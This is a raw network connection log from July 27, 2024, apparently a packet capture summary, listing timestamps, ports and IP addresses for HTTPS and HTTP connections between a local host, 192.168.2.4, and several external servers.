Jul 27, 2024 08:54:22.622741938 CEST	443	50704	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:22.622941971 CEST	50704	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:22.640321016 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.640347004 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.640367031 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.640400887 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.640427113 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.640455961 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.640569925 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.667205095 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.667284966 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.668494940 CEST	443	50704	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:22.684272051 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.684320927 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.684356928 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.684370995 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.684401989 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.726021051 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.764942884 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.764983892 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.765048027 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.765060902 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.765110970 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.765111923 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.779222965 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.779244900 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.779329062 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.779342890 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.779397964 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.791966915 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.792007923 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.792062044 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.792074919 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.792100906 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.792119980 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.815692902 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.815711975 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.815773010 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.815785885 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.815809965 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.815829039 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.855549097 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.855567932 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.855654955 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.855671883 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.855730057 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.865911961 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.865953922 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.865993977 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.866005898 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.866151094 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.866151094 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.867691040 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.867768049 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.867779016 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.867824078 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.867825985 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.867850065 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.867870092 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.867886066 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.867892027 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.867902994 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.907207012 CEST	50705	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:22.912301064 CEST	80	50705	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:22.912384033 CEST	50705	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:22.912502050 CEST	50705	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:22.912502050 CEST	50705	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:22.948961973 CEST	80	50705	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:22.948981047 CEST	80	50705	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:24.039020061 CEST	443	50704	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:24.039184093 CEST	443	50704	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:24.039261103 CEST	50704	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:24.054867983 CEST	50704	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:24.054892063 CEST	443	50704	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:24.156234980 CEST	80	50705	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:24.156987906 CEST	80	50705	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:24.157633066 CEST	50705	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:24.157685041 CEST	50705	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:24.164304018 CEST	50708	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:24.165945053 CEST	80	50705	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:24.169058084 CEST	50709	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:24.169152975 CEST	443	50709	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:24.169229984 CEST	50709	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:24.169616938 CEST	50709	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:24.169650078 CEST	443	50709	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:24.173537016 CEST	80	50708	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:24.176561117 CEST	50708	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:24.176683903 CEST	50708	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:24.176683903 CEST	50708	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:24.186254025 CEST	80	50708	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:24.189575911 CEST	80	50708	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:24.777174950 CEST	443	50709	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:24.777262926 CEST	50709	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:24.779521942 CEST	50709	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:24.779535055 CEST	443	50709	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:24.779599905 CEST	50709	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:24.779606104 CEST	443	50709	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:24.780117035 CEST	443	50709	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:24.780282974 CEST	50709	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:24.820527077 CEST	443	50709	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:25.551779985 CEST	80	50708	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:25.551800013 CEST	80	50708	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:25.551879883 CEST	50708	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:25.552090883 CEST	50708	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:25.555458069 CEST	50710	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:25.556835890 CEST	80	50708	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:25.560628891 CEST	80	50710	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:25.560695887 CEST	50710	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:25.560869932 CEST	50710	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:25.560920954 CEST	50710	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:25.565912962 CEST	80	50710	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:25.566730022 CEST	80	50710	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:26.105089903 CEST	443	50709	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:26.105283022 CEST	443	50709	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:26.105478048 CEST	50709	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:26.120100021 CEST	50709	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:26.120143890 CEST	443	50709	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:26.226069927 CEST	50712	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:26.226155043 CEST	443	50712	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:26.226246119 CEST	50712	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:26.226797104 CEST	50712	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:26.226875067 CEST	443	50712	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:26.753503084 CEST	80	50710	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:26.755031109 CEST	80	50710	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:26.755088091 CEST	50710	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:26.755173922 CEST	50710	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:26.759186983 CEST	50713	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:26.760552883 CEST	80	50710	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:26.764540911 CEST	80	50713	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:26.764605999 CEST	50713	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:26.765336990 CEST	50713	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:26.765348911 CEST	50713	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:26.770298004 CEST	80	50713	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:26.770328045 CEST	80	50713	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:26.887305021 CEST	443	50712	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:26.887511015 CEST	50712	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:26.938369036 CEST	50712	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:26.938446045 CEST	443	50712	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:26.938524961 CEST	50712	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:26.938539028 CEST	443	50712	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:26.939317942 CEST	443	50712	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:26.939888000 CEST	50712	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:26.939919949 CEST	443	50712	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:27.842607975 CEST	443	50712	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:27.842812061 CEST	443	50712	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:27.844229937 CEST	50712	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:27.861303091 CEST	50712	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:27.861303091 CEST	50712	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:27.861367941 CEST	443	50712	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:27.861402988 CEST	443	50712	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:27.938688993 CEST	80	50713	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:27.938991070 CEST	80	50713	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:27.939167023 CEST	50713	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:27.939218998 CEST	50713	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:27.941529989 CEST	50714	80	192.168.2.4	109.172.114.212
Jul 27, 2024 08:54:27.944107056 CEST	80	50713	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:27.946508884 CEST	80	50714	109.172.114.212	192.168.2.4
Jul 27, 2024 08:54:27.947287083 CEST	50714	80	192.168.2.4	109.172.114.212
Jul 27, 2024 08:54:27.947453976 CEST	50714	80	192.168.2.4	109.172.114.212
Jul 27, 2024 08:54:27.953008890 CEST	80	50714	109.172.114.212	192.168.2.4
Jul 27, 2024 08:54:27.974112034 CEST	50715	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:27.974217892 CEST	443	50715	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:27.974308968 CEST	50715	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:27.974670887 CEST	50715	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:27.974698067 CEST	443	50715	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:28.589674950 CEST	443	50715	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:28.589891911 CEST	50715	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:28.592876911 CEST	50715	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:28.592906952 CEST	443	50715	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:28.592958927 CEST	50715	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:28.592972040 CEST	443	50715	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:28.593065977 CEST	50715	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:28.593075991 CEST	443	50715	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:28.593254089 CEST	443	50715	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:28.593416929 CEST	50715	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:28.593446970 CEST	443	50715	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:29.727118015 CEST	50717	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:29.727205992 CEST	443	50717	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:29.727292061 CEST	50717	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:29.732585907 CEST	50717	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:29.732625008 CEST	443	50717	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:29.843089104 CEST	443	50715	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:29.843250990 CEST	443	50715	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:29.843630075 CEST	50715	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:29.859616041 CEST	50715	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:29.859616041 CEST	50715	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:29.859685898 CEST	443	50715	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:29.859771967 CEST	443	50715	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:29.963315010 CEST	50719	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:29.963418961 CEST	443	50719	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:29.963563919 CEST	50719	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:29.963938951 CEST	50719	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:29.963975906 CEST	443	50719	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:30.154242039 CEST	50720	443	192.168.2.4	104.26.2.16
Jul 27, 2024 08:54:30.154320002 CEST	443	50720	104.26.2.16	192.168.2.4
Jul 27, 2024 08:54:30.154401064 CEST	50720	443	192.168.2.4	104.26.2.16
Jul 27, 2024 08:54:30.165007114 CEST	50720	443	192.168.2.4	104.26.2.16
Jul 27, 2024 08:54:30.165083885 CEST	443	50720	104.26.2.16	192.168.2.4
Jul 27, 2024 08:54:30.236124992 CEST	443	50717	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:30.236222982 CEST	50717	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:30.261903048 CEST	50717	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:30.261986017 CEST	443	50717	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:30.262811899 CEST	443	50717	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:30.345006943 CEST	50717	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:30.345006943 CEST	50717	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:30.345232010 CEST	443	50717	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:30.606148005 CEST	443	50719	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:30.606384039 CEST	50719	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:30.609287024 CEST	50719	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:30.609316111 CEST	443	50719	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:30.609384060 CEST	50719	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:30.609396935 CEST	443	50719	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:30.609890938 CEST	443	50719	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:30.611339092 CEST	50719	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:30.611371040 CEST	443	50719	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:30.666834116 CEST	443	50720	104.26.2.16	192.168.2.4
Jul 27, 2024 08:54:30.667140007 CEST	50720	443	192.168.2.4	104.26.2.16
Jul 27, 2024 08:54:30.674165964 CEST	50720	443	192.168.2.4	104.26.2.16
Jul 27, 2024 08:54:30.674217939 CEST	443	50720	104.26.2.16	192.168.2.4
Jul 27, 2024 08:54:30.674735069 CEST	443	50720	104.26.2.16	192.168.2.4
Jul 27, 2024 08:54:30.720607042 CEST	443	50717	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:30.720660925 CEST	443	50717	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:30.720875025 CEST	50717	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:30.723084927 CEST	50717	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:30.723135948 CEST	443	50717	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:30.723165989 CEST	50717	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:30.723181009 CEST	443	50717	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:30.753568888 CEST	50720	443	192.168.2.4	104.26.2.16
Jul 27, 2024 08:54:30.755845070 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:30.755880117 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:30.756031036 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:30.756467104 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:30.756494045 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:30.796536922 CEST	443	50720	104.26.2.16	192.168.2.4
Jul 27, 2024 08:54:31.310159922 CEST	443	50720	104.26.2.16	192.168.2.4
Jul 27, 2024 08:54:31.310269117 CEST	443	50720	104.26.2.16	192.168.2.4
Jul 27, 2024 08:54:31.310336113 CEST	50720	443	192.168.2.4	104.26.2.16
Jul 27, 2024 08:54:31.310394049 CEST	443	50720	104.26.2.16	192.168.2.4
Jul 27, 2024 08:54:31.311136961 CEST	443	50720	104.26.2.16	192.168.2.4
Jul 27, 2024 08:54:31.311208010 CEST	50720	443	192.168.2.4	104.26.2.16
Jul 27, 2024 08:54:31.537024975 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:31.537128925 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:31.749764919 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:31.749825954 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:31.750029087 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:31.751230955 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:31.751271963 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:31.751399994 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:31.786098003 CEST	50720	443	192.168.2.4	104.26.2.16
Jul 27, 2024 08:54:31.834805012 CEST	443	50719	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:31.834966898 CEST	443	50719	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:31.837362051 CEST	50719	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:31.854449987 CEST	50719	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:31.854477882 CEST	443	50719	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:31.854492903 CEST	50719	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:31.854499102 CEST	443	50719	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:31.965504885 CEST	50722	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:31.965527058 CEST	443	50722	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:31.965961933 CEST	50722	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:31.966519117 CEST	50722	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:31.966528893 CEST	443	50722	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:32.142326117 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.142728090 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.142851114 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:32.142889977 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.143918991 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.144027948 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:32.144042015 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.145302057 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.145358086 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:32.145370960 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.148282051 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.148358107 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.148365021 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:32.148385048 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.148437977 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:32.149657011 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.228678942 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.228702068 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.228751898 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.228773117 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:32.228805065 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:32.232599974 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:32.232620955 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.232633114 CEST	50721	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:32.232639074 CEST	443	50721	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.644455910 CEST	443	50722	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:32.644548893 CEST	50722	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:32.660155058 CEST	50722	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:32.660190105 CEST	443	50722	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:32.660247087 CEST	50722	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:32.660254002 CEST	443	50722	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:32.661119938 CEST	443	50722	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:32.661349058 CEST	50722	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:32.661365032 CEST	443	50722	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:32.925174952 CEST	50723	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:32.925255060 CEST	443	50723	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:32.925441980 CEST	50723	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:32.925795078 CEST	50723	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:32.925822973 CEST	443	50723	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:33.302397966 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:33.302427053 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:33.302483082 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:33.305038929 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:33.305052042 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:33.400784016 CEST	443	50723	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:33.401004076 CEST	50723	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:33.410934925 CEST	50723	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:33.410986900 CEST	443	50723	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:33.411819935 CEST	443	50723	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:33.414320946 CEST	50723	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:33.414474964 CEST	50723	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:33.414556026 CEST	443	50723	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:33.414618969 CEST	50723	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:33.414633989 CEST	443	50723	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:33.533611059 CEST	443	50722	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:33.533773899 CEST	443	50722	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:33.533845901 CEST	50722	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:33.547041893 CEST	50722	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:33.547070026 CEST	443	50722	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:33.547231913 CEST	50722	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:33.547241926 CEST	443	50722	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:33.650635958 CEST	50725	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:33.650665045 CEST	443	50725	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:33.650863886 CEST	50725	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:33.651170969 CEST	50725	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:33.651181936 CEST	443	50725	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:33.913166046 CEST	443	50723	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:33.913392067 CEST	443	50723	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:33.915833950 CEST	50723	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:33.955552101 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:33.955668926 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.109278917 CEST	50723	443	192.168.2.4	188.114.97.3
